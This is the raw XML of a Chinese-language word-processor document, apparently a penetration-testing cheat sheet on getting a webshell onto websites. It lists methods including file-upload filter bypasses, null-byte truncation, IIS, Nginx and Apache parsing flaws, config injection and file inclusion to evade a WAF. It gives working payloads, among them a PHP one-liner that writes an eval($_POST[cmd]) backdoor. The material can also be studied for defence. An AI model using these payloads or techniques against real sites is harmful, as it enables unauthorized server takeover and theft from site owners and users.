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webshell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一.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获取webshell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(1)正常上传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网站对上传文件后缀格式并未过滤，直接上传webshell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(2)数据库备份拿webshell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网站对上传的文件后缀进行过滤，不予许上传脚本类型文件如php/asp/jsp/aspx等，而网站具有数据库备份功能，这时可以将webshell格式先改为允许上传的文件格式如jpg,gif等，然后，我们找到上传的文件路径，通过数据库备份，将文件备份为脚本格式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(3)本地js验证突破拿webshell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当网站设置了js来限制用户上传的文件类型时，我们可以通过删除js验证或者修改上传类型图突破上传拿webshell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(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改网站上传类型配置拿webshell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有的网站，在网站上传类型中限制了上传脚本类型，我们可以去添加上传文件类型如asp|php|jsp等拿webshell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(5)上传其他脚本类型拿webshell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当一台服务器具有多个网站，a网站是asp的站，b可能是php的网站，而a站中限制了上传文件类型为asp的文件。你可以尝试上传php的脚本来拿webshell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(6)00截断拿webshell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在上传文件的时候，你上传的文件名可能会被网站自动改成别的名字，这个时候你可以尝试抓取上传文件数据包，将文件名改为xx.asp%00.jpg进行截断上传，拿webshell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(7)利用解析漏洞拿webshell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a.IIS 5.x/6.0 解析漏洞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目录解析:在网站下建立文件夹名字为.asp .asa的文件夹，其目录内的任何扩展名的文件都被IIS当作asp文件来解析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文件解析:在IIS6.0下，分号后面的不被解析，也就是说cracer.asp;.jpg会被服务器看成cracer.asp，还有IIS6.0默认的可执行文件有asp/asa/cer/cdx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b.IIS 7.0/Nginx &lt;8.0畸形解析漏洞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在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg，内容为：&lt;?PHP fputs(fopen('shell.php','w'),'&lt;?php eval($_POST[cmd])?&gt;');?&gt;的文件，然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php。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c.Nginx &lt; 8.03 空字节代码执行漏洞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Nginx在图片中嵌入PHP代码然后通过访问xxx.jpg%00.ph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>来执行其中的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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d.Apache解析漏洞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apache是从右到左开始判断解析，如果为不可识别解析，就再往左判断.比如cracer.php.owf.rar的“.owf”和“.rar”，这两种后缀Apache不可识别解析，Apache就会把cracer.php.owf.rar解析成php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(8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用编译器漏洞拿webshell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(9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网站配置插马拿webshell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通过找到网站默认配置，将一句话插入到网站配置中，不过为了能够成功执行插马，建议先下载该网站的源码，进行查看源码过滤规则，以防插马失效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(10)修改脚本直接拿webshell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有的网站可以修改脚本文件，可以直接拿webshell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(11)文件包含拿webshell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先将webshell为txt文件上传，在上传一个脚本文件包含该txt文件，可绕过waf拿webshell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asp包含 &lt;!--#include file=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”1.txt” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--&gt;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php包含&lt;?php include(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“1.txt”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)?&gt;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(12)0day拿webshell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D6287"/>
    <w:rsid w:val="166C8E2B"/>
    <w:rsid w:val="26DF3A78"/>
    <w:rsid w:val="36FFC9F1"/>
    <w:rsid w:val="3D2D6312"/>
    <w:rsid w:val="6A95665F"/>
    <w:rsid w:val="7BED6287"/>
    <w:rsid w:val="7D7BBEBE"/>
    <w:rsid w:val="9C5DF2E0"/>
    <w:rsid w:val="BED72AAE"/>
    <w:rsid w:val="BFF86B1A"/>
    <w:rsid w:val="ED77B903"/>
    <w:rsid w:val="EFEE35EE"/>
    <w:rsid w:val="EFFFC2E3"/>
    <w:rsid w:val="F24FAF82"/>
    <w:rsid w:val="F87F0598"/>
    <w:rsid w:val="FFEFF5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2017-08-12T12:01:00Z</dcterms:created>
  <dc:creator>wu</dc:creator>
  <cp:lastModifiedBy>wu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-11T20:57:52Z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